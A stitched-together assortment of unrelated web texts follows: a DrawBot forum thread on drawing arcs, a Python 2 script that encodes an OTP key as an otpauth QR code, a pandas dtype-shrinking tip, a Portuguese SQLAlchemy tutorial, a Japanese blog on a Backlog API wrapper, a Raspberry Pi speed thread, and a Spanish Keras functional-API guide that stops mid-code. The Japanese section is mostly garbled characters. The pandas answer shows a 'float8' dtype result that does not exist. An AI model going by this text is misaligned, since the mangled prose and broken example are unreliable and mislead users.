This is the code I'm using, and the reason I didn't use the oval tool is that I want to make random movements on every arc.
def shapePage(o=0, wd=1000, hg=1000, sWd=10, positive=True, cur = True, double=False):
hWd = wd / 2
hHg = hg / 2
hsWd = sWd / 2
def canvas():
newPage(wd, hg)
if positive is True:
fill(1)
if positive is False:
fill(0)
rect(o, o, wd, hg)
def blackShape():
path = BezierPath()
fill(None)
if positive is True:
stroke(0)
if positive is False:
stroke(1)
strokeWidth(sWd)
def shape(cur, radius=hWd):
points = [
[hWd, o + hsWd],
[wd - hsWd, o + hsWd],
[wd - hsWd, hHg],
[wd - hsWd, hg - hsWd],
[hWd, hg - hsWd],
[o + hsWd, hg - hsWd],
[o + hsWd, hHg],
[o + hsWd, o + hsWd],
[hWd, hHg]
]
while radius >= sWd * 2:
newsWd=sWd * 2
if cur is True:
path.moveTo(points[0])
path.arcTo(points[1], points[2], radius)
path.arcTo(points[3], points[4], radius)
path.arcTo(points[5], points[6], radius)
path.arcTo(points[7], points[0], radius)
if cur is False:
path.moveTo(points[0])
path.lineTo(points[1])
path.lineTo(points[2])
path.lineTo(points[3])
path.lineTo(points[4])
path.lineTo(points[5])
path.lineTo(points[6])
path.lineTo(points[7])
path.lineTo(points[0])
lineCap("butt")
#lineJoin("miter")
closePath()
drawPath(path=path)
for point in points:
if point[0] < hWd:
point[0] += newsWd
if point[0] > hWd:
point[0] -= newsWd
if point[0] == hWd:
point[0] = point[0]
if point[1] < hHg:
point[1] += newsWd
if point[1] > hHg:
point[1] -= newsWd
if point[1] == hHg:
point[1] = point[1]
radius -= newsWd
shape(cur)
if double is True:
shape(not cur)
canvas()
blackShape()
every arc is separate contours in a path, what you see is the
lineCap(see)
eduairetlast edited by
Thank you @frederik ! I was wondering if there's a way to access to the curves of an oval(x, y, w, h)
gferreiralast edited by
hello @eduairet,
you can draw an oval using a
BezierPath, and then access its contours and points:
B = BezierPath()
B.oval(100, 100, 800, 800)
print(B.contours)
print(B.points)
print(B.onCurvePoints)
print(B.offCurvePoints)
cheers!
eduairetlast edited by
@gferreira great!!!! thank you very much.
|
blob: 2f64fc5dcd4ce4418309c211d38478dd3d2caf06 (
plain
)
#!/usr/bin/python
# Copyright 2013 Peter Palfrader
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import base64
import optparse
import subprocess
import sys
import urllib
parser = optparse.OptionParser()
parser.set_usage("%prog [options] [key]")
parser.add_option("-r", "--raw", dest="raw", default=False, action="store_true",
help="Encode just the base32 key, not an otpauth:// URL.")
parser.add_option("-n", "--name", dest="name",
help="Provide a name for this otpauth token.")
parser.add_option("-u", "--user", dest="user",
help="Provide a username for this otpauth token.")
parser.add_option("-b", "--base32", dest="base32", default=False, action="store_true",
help="Key already is in base32.")
parser.add_option("-v", "--verbose", dest="verbose", default=0, action="count",
help="Verbose output.")
(options, args) = parser.parse_args()
if len(args) >= 2:
parser.print_help()
sys.exit(1)
elif len(args) == 1:
hexkey = args[0]
else:
print "Enter key: ",
hexkey = sys.stdin.readline().rstrip()
if options.base32:
b32key = hexkey
else:
binkey = base64.b16decode(hexkey, True)
b32key = base64.b32encode(binkey)
if options.raw:
msg = b32key
else:
name = urllib.quote(options.name) if options.name is not None else 'token'
name += ':' + urllib.quote(options.user) if options.user is not None else ''
msg = "otpauth://totp/%s?secret=%s"%(name, b32key)
msg += '&issuer=%s'%(urllib.quote(options.name),) if options.name is not None else ''
if options.verbose > 0:
print msg
p = subprocess.Popen(['qrencode', '-s', '10', '-o', '-'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
(out, dummy) = p.communicate(msg)
if p.returncode != 0:
raise Exception("qrencode failed.")
p = subprocess.Popen(['display'], stdin=subprocess.PIPE)
p.communicate(out)
if p.returncode != 0:
raise Exception("display failed (exitcode: %d)."%(p.returncode,))
|
I run into memory problem when processing very large dataframe.
The problem is that Pandas use float64 and int64 numpy dtypes by default even in cases when it is totally unnecessary (you have e.g. only binary values). Furthermore, it is not even possible to change this default behaviour.
Hence, I wrote a function which finds the smallest possible dtype for a specific array.
import numpy as np
import pandas as pd
def safely_reduce_dtype(ser): # pandas.Series or numpy.array
orig_dtype = "".join([x for x in ser.dtype.name if x.isalpha()]) # float/int
mx = 1
for val in ser.values:
new_itemsize = np.min_scalar_type(val).itemsize
if mx < new_itemsize:
mx = new_itemsize
new_dtype = orig_dtype + str(mx * 8)
return new_dtype # or converts the pandas.Series by ser.astype(new_dtype)
So, e.g.:
>>> import pandas
>>> serie = pd.Series([1,0,1,0], dtype='int32')
>>> safely_reduce_dtype(serie)
dtype('int8')
>>> float_serie = pd.Series([1,0,1,0])
>>> safely_reduce_dtype(float_serie)
dtype('float8') # from float64
Using this you can reduce the size of your dataframe significantly up to factor 4.
Update:
There is pd.to_numeric(series, downcast='float') in Pandas 0.19. The above was written before it was out and can be used in old versions.
|
Eu trabalhei com o Projeto Jupyter de dezembro/2018 até março/2019 como parte de um estágio no programa Outreachy. Foi uma experiência maravilhosa e super recomendo! Durante o meu estágio, eu lutei com a biblioteca SQLAlchemy que o JupyterHub utiliza internamente.
Como estudei essa biblioteca e tive que fazer algumas buscas no Stack Overflow pra entender várias coisas, decidi criar este post para ajudar a digerir algumas das minhas dúvidas e descobertas.
Todo o código está disponível neste repositório.
Criando e entendendo o Engine (mecanismo)
Para começar a trabalhar com o SQLAlchemy, a primeira coisa que eles ensinam nos tutoriais é que você deve criar um engine. O engine é como o SQLAlchemy se comunica com o banco de dados. Portanto, ao criar o mecanismo, você deve adicionar a URL do banco de dados (chamada pela abreviação em inglês db) e é basicamente isso.
from sqlalchemy import create_engine engine = create_engine('sqlite:///:memory:', echo=True)
Embora você possa acessar o banco de dados por meio de comandos do engine (veremos como), geralmente esse não é o recomendado. Você pode, mas não deve 🙂 O engine é para ser apenas a ponte de conexão entre o Python e o banco.
Nesse comando, você está apenas dizendo para o SQLAlchemy onde seu banco de dados está localizado. O atributo echo = True fará com que SQLAlchemy registre no console todos os comandos SQL que você está executando através dos comandos e os resultados otidos. Esse parâmetro não deve ficar ativado em produção, ok?
Uma vez que seu engine conhece seu banco de dados, é fácil executar comandos usando um método chamado engine.execute(...). Veja o exemplo abaixo:
Portanto, você tem uma via de mão dupla: o engine que sabe onde está o seu banco de dados e um método (engine.execute(...)) para alterar o banco de dados usando o engine:
Engine ou conexão?
Também vi em alguns tutoriais que você tem outra maneira de executar comandos SQL através do engine que é através de uma connection (conexão). Isso acontece da seguinte forma:
conn = engine.connect()
conn.execute(...)
Isso nos permite criar comandos transientes, o que significa que todos os comandos devem ser executados com êxito no banco de dados ou todos devem ser revertidos em caso de erro [1]:
trans = conn.begin() conn.execute('INSERT INTO "EX1" (name) ' 'VALUES ("Hello")') trans.commit()
Então, na verdade, a estrutura de comunicação se parece mais com isso:
No entanto, quando eu continuei investigando as diferenças entre engine.execute(...) e connection.execute(...) eu descobri que elas não são diferentes:
“Usar engine.execute() e connection.execute() é (quase) a mesma coisa. No primeiro, o objeto connection é criado implicitamente e, no segundo, nós o instanciamos explicitamente."
Então, fique à vontade para usar qualquer uma delas, se quiser :)
Até agora, nos conectamos no banco de dados e puder executar comandos através de instruções SQL. No entanto, o que torna o SQLAlchemy tão atraente é o ORM (Object Relational Mapping), que eu não comentei até agora.
O ORM precisa de uma session (sessão) para fazer um meio de campo entre os objetos que criamos no Python e o engine que realmente se comunica com o banco de dados. Vamos criar usar uma função chamada sessionmaker pra passar o engine pra nossa sessão atual e criarmos de fato a sessão:
from sqlalchemy.orm import sessionmaker Session = sessionmaker(bind=engine) session = Session()
Então, daqui pra frente, nós vamos usar o session para conversar com as tabelas e fazer consultas, mas é o engine que realmente está implementando coisas no seu banco de dados.
Embora pareça confuso ter três entidades antes mesmo de começar a mexer com tabelas, na maioria das vezes após a configuração inicial você vai usar a session muito mais do que o engine e a conexão será feita implicitamente por ele.
Criando tabelas
Agora que entendemos a estrutura básica, a primeira coisa a fazer é começar a criar tabelas em nosso banco de dados e finalmente começar a dar uma olhada no ORM do SQLAlchemy.
Para criar novas tabelas, precisamos criar classes que contêm atributos. Cada classe será uma tabela em nosso banco de dados e cada atributo será uma coluna na tabela. Para mapear qual tabela no banco de dados será relacionada com cada classe em nossos arquivos, usaremos um sistema SQLAlchemy chamado Declarative (Declarativo). Para usar isso, a primeira coisa que devemos fazer é instanciar uma Base:
from sqlalchemy.ext.declarative import declarative_base Base = declarative_base()
Agora vamos criar uma classe User que herda da Base declarativa que acabamos de criar. Criaremos apenas três atributos para nossa classe: id (que é uma chave primária), um nome e uma senha. Como estamos usando Declarativos, devemos adicionar pelo menos dois atributos à nossa classe:
__tablename__indica como sua tabela será realmente chamada dentro do banco de dados
Ao menos um dos atributos deve ser declarado como uma chave primária [2].
Também é bom adicionar um método opcional chamado __repr__ que será um texto (string) que deve ser retornado quando tivermos a instância da classe User.
from sqlalchemy import Column, Integer, String class User(Base): __tablename__ = 'users' id = Column(Integer, primary_key=True) name = Column(String) password = Column(String) def __repr__(self): return f'User {self.name}'
Agora temos uma classe que indica como nossa tabela deve ser no nosso banco de dados. No entanto, nada mudou até agora. O banco de dados ainda não conhece essa estrutura. Para realmente criar as tabelas em nosso banco de dados seguindo a estrutura que definimos na classe User, precisamos usar a Base declarativa que acabamos de criar e precisamos do engine:
Base.metadata.create_all(engine)
É só nesse momento que o SQLAlchemy realmente vai implementar as mudanças no banco de dados. Como definimos o parâmetro echo como verdadeiro (True), podemos ver exatamente quais são instruções aplicadas via SQL que o engine está gerando:
Adicionando novos usuários
Agora que a tabela de fato existe no banco de dados, podemos usar a classe para criar um novo registro no banco. Podemos usar a classe User para criar um novo usuário e session.add(...) para adicionar a instância ao nosso banco de dados como uma nova linha.
user = User(name='John Snow', password='johnspassword') session.add(user) print(user.id) # None
Anteriormente eu comentei que sempre precisamos de uma chave primária, mas no exemplo acima eu não passei uma para o modelo. Se eu tentar imprimir o id do usuário que acabei de criar, ele vai retornar None.
Isso ocorre porque o session.add apenas registra as transações que queremos que sejam feitas, mas na verdade não faz nenhuma mudança no banco [3].
Conforme explicado neste link, temos duas operações que podem ser realizadas aqui:
session.flush() comunica uma série de operação ao banco de dados (inserir, atualizar, apagar). O banco de dados às mantém como operações pendentes em uma trasação. As mudanças não são persistidas no dsco ou visíveis em outras transações até o banco dados receber um COMMIT para a transação atual (que é o que o session.commit() faz).
ou
session.commit() persiste as mudanças no banco de dados. Esse comando sempre chamasession.flush()como parte dele.
Fazendo buscas
Depois de termos registros no banco de dados, precisamos ter acesso a eles :)
Para isso podemos usar o método query presente na nossa session. O método recebe como parâmetro a classe que representa a tabela do banco em que queremos fazer a busca pelo nosso registro. Depois usamos o método filter_by para buscar uma característica em uma das colunas (ou atributos da classe)
query = session.query(User).filter_by(name='John')
Por fim, passamos um método para indicar o que queremos fazer com esta consulta: contar o número de registros encontrados (.count()), retornar todos os registros encontrados (.all()), retornar apenas o primeiro registro (.first()) e assim por diante:
query.count()
Outra maneira de fazer essa busca é usar o método filter, em vez do filter_by, que possui uma sintaxe ligeiramente diferente:
session.query(User).filter(User.name=='John').first()
Com o método filter, você também pode procurar não por strings exatas mas por partes de strings:
session.query(User).filter(User.name.like('%John%')).first()
No Jupyterhub, foi adicionado a cada modelo um método de classe que simplifica essa sintaxe bastante complicada. Nesse caso criamos um método, que é um classmethod, que apenas precisa receber a session e consegue fazer a busca de maneira mais simples. O método fica escrito dessa forma:
class User(Base): ... @classmethod def find_by_name(cls, session, name): return session.query(cls).filter_by(name=name).all()
E a busca fica mais simples para encontrar usuários com o nome John:
Product.find_by_name(session, 'John')
Adicionando tabelas depois de iniciar o banco com create_all
Um dos problemas que tive enquanto trabalhava com o Projeto Jupyter, é que eu precisava criar uma nova tabela em um banco de dados e um engine que já estavam criados, ou seja, depois do Base.metadata.create_all(engine).
Então, imagine que agora eu quero uma tabela com Produtos (Product) como a seguinte:
from sqlalchemy import Column, Integer, String class Product(Base): __tablename__ = 'products' id = Column(Integer, primary_key=True) name = Column(String)
A maneira mais simples que eu encontrei de criar essa nova tabela no banco de dados foi:
Product.__table__.create(engine)
Criando uma relação com chave estrangeira (foreign key)
Imagine que você gostaria de conectar cada produto (product) a um usuário (user) em seu sistema. Portanto, em cada instância da classe Product, você gostaria de armazenar uma instância da classe User:
Se você estiver criando todas as tabelas agora, uma classe Column como atributo da sua classe Product e indique esse atributo faz referência à chave estrangeira da classe User e que vai armazenar o atributo id como chave estrangeira:
from sqlalchemy import Column, ForeignKey, Integer, String from sqlalchemy.orm import relationship class Product(Base): __tablename__ = 'product' id = Column(Integer, primary_key=True) name = Column(String) user_id = Column(Integer, ForeignKey('user.id')) user = relationship('User')
Agora é preciso ir na classe User e adicionar essa relação com Produto para que seja possível acessar produtos que estão atrelados a um usuário:
from sqlalchemy import Column, Integer, String from sqlalchemy.orm import relationship class User(Base): __tablename__ = 'user' # if you use base it is obligatory id = Column(Integer, primary_key=True) # obligatory name = Column(String) password = Column(String) products = relationship(Product, backref="users")
É possível criar as tabelas usando o Base.metadata.create_all(engine) que vimos anteriormente. E agora, você pode criar um usuário e um produto relacionados entre si da seguinte forma:
user = User(name='John') product = Product(name='wolf', user=user) session.add_all([user, product]) session.commit()
E é isso 🙂
❤ Abraço! Leticia
|
å½ç¤¾ã§ã¯ããã¸ã§ã¯ã管çãã¼ã«ã¨ãã¦å ¨ç¤¾çã«Nulab社ã®Backlogã使ãã¾ãã£ã¦ããã®ã§ããã社å ã®ç 修課é¡ãã客æ§ã¸ã®ãã¢ãªã³ã°èª²é¡ã䏿ç»é²ããããæã®ããã¸ã§ã¯ãã§ä½ã£ãwikiãæ°ããããã¸ã§ã¯ãã«ç§»ç®¡ãããã¨ããä½ãã¨APIã使ããããããªããã¨ããã·ã¼ã³ã«ééãã¾ãã
ããããã¨ãã«ä½¿ããéå ·ã¨ãã¦ãããç°¡åãªPythonã©ããã¼ãä½ã£ã¦ã¿ã¾ããã®ã§ãç´¹ä»ãã¾ãã
â»è©³ããã¯ä»¥ä¸ã®PyPIããã¸ã§ã¯ããã¼ã¸ãGitHubãã覧ãã ããã
ä½¿ãæ¹
PyPIã«ã¯ python-backlog ã¨ããåç§°ã§ç»é²ãã¦ãã¾ãã以ä¸ã®ã³ãã³ãã§å©ç¨å¯è½ã§ãã
pip install python-backlog
backlog.base.BacklogAPI ãAPIãªãã¸ã§ã¯ãã§ãã弿°ã¨ãã¦space, api_keyãåãåãã¾ãã
READMEã«ãæ¸ãã¦ãã¾ããã backlog.util.load_conf() ã§yamlããèªè¨¼ã®è¨å®ãå¼ã£å¼µããã¨ãå¯è½ã§ãï¼ãããå®è£
ããããã«æ¬è³ªçãªæ©è½ã¨ã¯ç¡é¢ä¿ãªPyYAMLã¸ã®ä¾åãçºçãã¦ãã¾ã£ã¦ãã¾ããå·çæç¹ã§ã¯ãã®ä¾åããã¾ããã¸ãã£ãã«æãã¦ããããå°æ¥çã«ã¯æ¶ãããããã¾ããï¼ã
from backlog.util import load_conf
from backlog.base import BacklogAPI
conf = load_conf("conf.yml")["backlog"]
api = BacklogAPI(conf["space"], conf["api_key"])
ä¾ãã°wikiã®ãªã¹ããæ¬²ããå ´åã¯ä»¥ä¸ã®ããã«æ¸ãã¾ãã
import json
# list wikis
wikis = api.wiki.list("SampleProject")
print(json.dumps(wikis[0], indent=2))
API Clientãªãã¸ã§ã¯ãã®é
ä¸ã«Backlogãªã½ã¼ã¹ã®åå空éãããããã®ãªã½ã¼ã¹ã«é¢é£ããæä½ãä¾ãã°wikiã®ãªã¹ã㯠backlog_client.wiki.list() ã®ããã« wiki ã®ã¡ã½ããå¼ã³åºãã¨ãã¦å©ç¨ãã¾ãããã©ã¡ã¼ã¿ã®ä»æ§ã¯Backlogã®APIãªãã¡ã¬ã³ã¹ã«æºæ ãã¾ãã
ã¡ã½ããã®docstringã«ã¯å¯¾å¿ããBacklog APIã®ãªãã¡ã¬ã³ã¹ã®ãªã³ã¯ãè¨è¿°ãã¦ãã¾ãã®ã§ãã¡ã½ãããè¦æ±ãããã©ã¡ã¼ã¿ã確èªããããã°å¯¾è±¡ã¡ã½ããã®docstringãåç §ãã¦ãã ããã
注æ
MacOS(or Linux) + Python3.6ãåæã¨ãã¦ãã¾ããPython2.xã ã¨(ãã¶ã)åããªãã§ã
Windowsãå¤ååãã¾ãããç¾ç¶ã§ã¯dockerä¸ã®ç°å¢ã§å©ç¨ãããããããªã¨æãã¾ã
ãµãã¼ããã¦ããªããªã½ã¼ã¹ãã¾ã ã¾ã å¤ãã§ãããªã½ã¼ã¹ãªãã¸ã§ã¯ãèªä½ãæªå®ç¾©ã§ãããããããã¯ã¡ã½ããã NotImplementedãåãã¦è½ã¡ããããªä»æ§ã«ãªã£ã¦ãã¾ã
ã¾ã¨ã
èªä½ããã±ã¼ã¸ãPyPIã«å ¬éããã¨ããã¾ã§ãã£ãã®ã¯åã§ããããè²ã ã¨åå¼·ã«ãªããã¨ãå¤ãã£ãã§ããã¾ã Betaãã¼ã¸ã§ã³ã§ã¯ããã¾ããæ¯é使ã£ã¦ã¿ã¦ããã ããã¨å¬ããã§ãã
æçµå½¢ã®ã¤ã¡ã¼ã¸ã¯ãããæ´ã«ã©ããããCLIãã¼ã«ãªã®ã§ããã¡ããï¼æè¿ãµãã£ã¦ããã©ï¼éçºä¸ã§ãã
ãããªæãâã§ä½¿ããããããªãã¨å¦æ³ãã¦ãã¾ã
# ã‚るプãƒã‚¸ã‚§ã‚¯ãƒˆé…下ã®wikiをリスト表示
backlog wiki ls --project xxx
# プãƒã‚¸ã‚§ã‚¯ãƒˆAé…下ã®wikiをプãƒã‚¸ã‚§ã‚¯ãƒˆBã«ç§»è¡Œ
backlog wiki cp backlog://project-A/* backlog://project-B/
åé¿ããã°åéãããããããæä½ã§ã¯ããã¾ãããpython-backlogããããããé¡ããã¾ãã
|
Tried the Python code above on my modern PC (after modifying the print command for Python 3.4) so this:
Code: Select all
import time
x = 0
def doit1(i):
global x
x = x + i
list = range(100000)
t = time.time()
for i in list:
doit1(i)
print ("%.3f" % (time.time()-t))
and it came out as 0,03, which is just about 20 times faster than the PI's 0.595 second.
seems reasonable to me, python isn't that fast! and a PI being twenty times slower than a modern PC seems a good estimate of the PI's speed.
¿1 second to just count to 100.000? That was acceptable at 1990s but not today imo.
In defense of python. the above code is not simply counting to 100.000, this code does it better, but modified for 1000.000 as otherwise it was too fast!
Code: Select all
import time
list = 1000000
t = time.time()
i = 1
while i < list:
i = i+1
print ("%.3f" % (time.time()-t))
That code scored 0.15 sec on my PC.
By the way, which PI are you using?
|
Ver en TensorFlow.org Correr en Google Colab Ver código fuente en GitHub Descargar notebook
Setup
import tensorflow as tf
tf.keras.backend.clear_session() # Reseteo sencillo
Introduccion
Ya estás familiarizado con el uso del metodo keras.Sequential() para crear modelos.La API funcional es una forma de crear modelos mas dinamicos que con Sequential: La API funcional puede manejar modelos con topología no lineal, modelos con capas compartidas y modelos con múltiples entradas o salidas.
Se basa en la idea de que un modelo de aprendizaje profundosuele ser un gráfico acíclico dirigido (DAG) de capas.La API funcional es un conjunto de herramientas para construir gráficos de capas.
Considera el siguiente modelo:
(input: 784-vectores dimensionales)
↧
[Dense (64 units, activacion relu)]
↧
[Dense (64 units, activacion relu)]
↧
[Dense (10 units, activacion softmax)]
↧
(output: distribución de probabilidad en 10 clases)
Es una simple grafica de tres capas.
Para construir este modelo con la API funcional, comenzarías creando un nodo de entrada:
from tensorflow import keras
inputs = keras.Input(shape=(784,))
Aqui solo especificamos el tipo de nuestra data set: 784-vectores dimensionales.Nota que el tamaño del batch siempre debe ser omitido, solo se incluye el tipo de la data set.Para una input de tipo imágen (31,32,3) hubiese sido:
img_inputs = keras.Input(shape=(32, 32, 3))
Lo que se devuelve, input, contiene información sobre la forma y el tipo de dato que se espera ingresa en tu modelo:
inputs.shape
TensorShape([None, 784])
inputs.dtype
tf.float32
Puedes crear un nuevo nodo en el grafico de capas mandando a llamar al objeto input.
from tensorflow.keras import layers
dense = layers.Dense(64, activation='relu')
x = dense(inputs)
La acción "layer call" es como dibujar una flecha desde "entradas" a la capa que creamos.Estamos "pasando" las entradas a la capa dense, y afuera obtenemosx.
Agreguemos algunas capas más a nuestro gráfico de capas:
La acción "llamada a la capa" es como dibujar una flecha de "entradas" a la capa que creamos.
Estamos pasando las entradas a una capa mas densa, y respecto a la salida obtenemos una x.
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
LLegados a este punto, podemos crear un Modelo especificando sus entradas y salidas en las capas de graficas.
model = keras.Model(inputs=inputs, outputs=outputs)
Recapitulando, esta es nuestra definción completa del proceso:
inputs = keras.Input(shape=(784,), name='img')
x = layers.Dense(64, activation='relu')(inputs)
x = layers.Dense(64, activation='relu')(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs=inputs, outputs=outputs, name='mnist_model')
Veamos como se muestra el model summary:
model.summary()
Model: "mnist_model" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 784)] 0 _________________________________________________________________ dense_3 (Dense) (None, 64) 50240 _________________________________________________________________ dense_4 (Dense) (None, 64) 4160 _________________________________________________________________ dense_5 (Dense) (None, 10) 650 ================================================================= Total params: 55,050 Trainable params: 55,050 Non-trainable params: 0 _________________________________________________________________
También podemos trazar el modelo como un gráfico:
keras.utils.plot_model(model, 'my_first_model.png')
Y opcionalmente mostrar la entrada y la salida de la forma de cada capa en la gráfica ploteada:
keras.utils.plot_model(model, 'my_first_model_with_shape_info.png', show_shapes=True)
Esta figura y el código que escribimos son prácticamente idénticos. En la versión de código, las flechas de conexión simplemente se reemplazan por la operación de llamada.
Un "gráfico de capas" es una imagen mental muy intuitiva para un modelo de aprendizaje profundo, y la API funcional es una forma de crear modelos que reflejan de cerca esta imagen mental.
Entrenamiento, evaluación e inferencia.
El entrenamiento, la evaluación y la inferencia funcionan exactamente de la misma manera para los modelos construidos utilizando la API funcional como para los modelos secuenciales.
Aquí hay una demostración rápida.
Aquí cargamos datos de imagen MNIST, los rediseñamos en vectores, ajustar el modelo en los datos (mientras se monitorea el rendimiento en una división de validación), y finalmente evaluamos nuestro modelo en los datos de prueba:
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
x_train = x_train.reshape(60000, 784).astype('float32') / 255
x_test = x_test.reshape(10000, 784).astype('float32') / 255
model.compile(loss='sparse_categorical_crossentropy',
optimizer=keras.optimizers.RMSprop(),
metrics=['accuracy'])
history = model.fit(x_train, y_train,
batch_size=64,
epochs=5,
validation_split=0.2)
test_scores = model.evaluate(x_test, y_test, verbose=2)
print('Test loss:', test_scores[0])
print('Test accuracy:', test_scores[1])
Epoch 1/5 750/750 [==============================] - 2s 2ms/step - loss: 0.3558 - accuracy: 0.8995 - val_loss: 0.1930 - val_accuracy: 0.9440 Epoch 2/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1724 - accuracy: 0.9482 - val_loss: 0.1452 - val_accuracy: 0.9563 Epoch 3/5 750/750 [==============================] - 2s 2ms/step - loss: 0.1251 - accuracy: 0.9624 - val_loss: 0.1184 - val_accuracy: 0.9656 Epoch 4/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0997 - accuracy: 0.9705 - val_loss: 0.1127 - val_accuracy: 0.9668 Epoch 5/5 750/750 [==============================] - 2s 2ms/step - loss: 0.0824 - accuracy: 0.9756 - val_loss: 0.1073 - val_accuracy: 0.9698 313/313 - 0s - loss: 0.1017 - accuracy: 0.9701 Test loss: 0.1017443984746933 Test accuracy: 0.9700999855995178
Para obtener una guía completa sobre el entrenamiento y evaluación de modelos, consulta Guía de entrenamiento y evaluación.
Almacenado y serialización
El almacenado y la serialización funcionan exactamente de la misma manera para los modelos construidos utilizando la API funcional como para los modelos secuenciales.
Una forma estándar de guardar un modelo funcional es llamar a model.save () para guardar todo el modelo en un solo archivo.Posteriormente, puede volver a crear el mismo modelo a partir de este archivo, incluso si ya no tiene acceso al código.eso creó el modelo.
Este archivo incluye:
La arquitectura del modelo.
Los valores de peso del modelo (que se aprendieron durante el entrenamiento)
La configuración de entrenamiento del modelo (lo que pasó a compilar), si corresponde
El optimizador y su estado, si corresponde (esto le permite reiniciar el entrenamiento donde lo dejó)
model.save('path_to_my_model.h5')
del model
# Recrea el mismo modelo, desde el archivo:
model = keras.models.load_model('path_to_my_model.h5')
Para obtener una guía completa sobre el guardado de modelos, consulta Guía para guardar y serializar modelos.
Usando el mismo gráfico de capas para definir múltiples modelos
En la API funcional, los modelos se crean especificando sus entradas y salidas en un gráfico de capas. Eso significa que un solo gráfico de capas Se puede utilizar para generar múltiples modelos.
En el siguiente ejemplo, usamos la misma arquitectura de capas para crear instancias de dos modelos:un modelo de "codificador" que convierte las entradas de imagen en vectores de 16 dimensiones,y un modelo completo de autoencoder para entrenamiento.
encoder_input = keras.Input(shape=(28, 28, 1), name='img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
x = layers.Reshape((4, 4, 1))(encoder_output)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
x = layers.Conv2DTranspose(32, 3, activation='relu')(x)
x = layers.UpSampling2D(3)(x)
x = layers.Conv2DTranspose(16, 3, activation='relu')(x)
decoder_output = layers.Conv2DTranspose(1, 3, activation='relu')(x)
autoencoder = keras.Model(encoder_input, decoder_output, name='autoencoder')
autoencoder.summary()
Model: "encoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 ================================================================= Total params: 18,672 Trainable params: 18,672 Non-trainable params: 0 _________________________________________________________________ Model: "autoencoder" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= img (InputLayer) [(None, 28, 28, 1)] 0 _________________________________________________________________ conv2d (Conv2D) (None, 26, 26, 16) 160 _________________________________________________________________ conv2d_1 (Conv2D) (None, 24, 24, 32) 4640 _________________________________________________________________ max_pooling2d (MaxPooling2D) (None, 8, 8, 32) 0 _________________________________________________________________ conv2d_2 (Conv2D) (None, 6, 6, 32) 9248 _________________________________________________________________ conv2d_3 (Conv2D) (None, 4, 4, 16) 4624 _________________________________________________________________ global_max_pooling2d (Global (None, 16) 0 _________________________________________________________________ reshape (Reshape) (None, 4, 4, 1) 0 _________________________________________________________________ conv2d_transpose (Conv2DTran (None, 6, 6, 16) 160 _________________________________________________________________ conv2d_transpose_1 (Conv2DTr (None, 8, 8, 32) 4640 _________________________________________________________________ up_sampling2d (UpSampling2D) (None, 24, 24, 32) 0 _________________________________________________________________ conv2d_transpose_2 (Conv2DTr (None, 26, 26, 16) 4624 _________________________________________________________________ conv2d_transpose_3 (Conv2DTr (None, 28, 28, 1) 145 ================================================================= Total params: 28,241 Trainable params: 28,241 Non-trainable params: 0 _________________________________________________________________
Tenga en cuenta que hacemos que la arquitectura de decodificación sea estrictamente simétrica a la arquitectura de codificación,para que obtengamos una forma de salida que sea igual a la forma de entrada (28, 28, 1).El reverso de una capa Conv2D es una capaConv2DTranspose, y el reverso de una capa MaxPooling2DLa capa es una capa UpSampling2D.
Todos los modelos son invocables, al igual que las capas.
Puede tratar cualquier modelo como si fuera una capa, llamándolo en una Entrada o en la salida de otra capa.Tenga en cuenta que al llamar a un modelo no solo está reutilizando la arquitectura del modelo, también está reutilizando sus pesos.
Veamos esto en acción. Aquí hay una versión diferente del ejemplo de autoencoder que crea un modelo de codificador, un modelo de decodificador, y encadenarlos en dos llamadas para obtener el modelo de autoencoder:
encoder_input = keras.Input(shape=(28, 28, 1), name='original_img')
x = layers.Conv2D(16, 3, activation='relu')(encoder_input)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(32, 3, activation='relu')(x)
x = layers.Conv2D(16, 3, activation='relu')(x)
encoder_output = layers.GlobalMaxPooling2D()(x)
encoder = keras.Model(encoder_input, encoder_output, name='encoder')
encoder.summary()
decoder_input = keras.Input(shape=(16,), name='encoded_img')
x = layers.Reshape((4, 4, 1))(decoder_input)
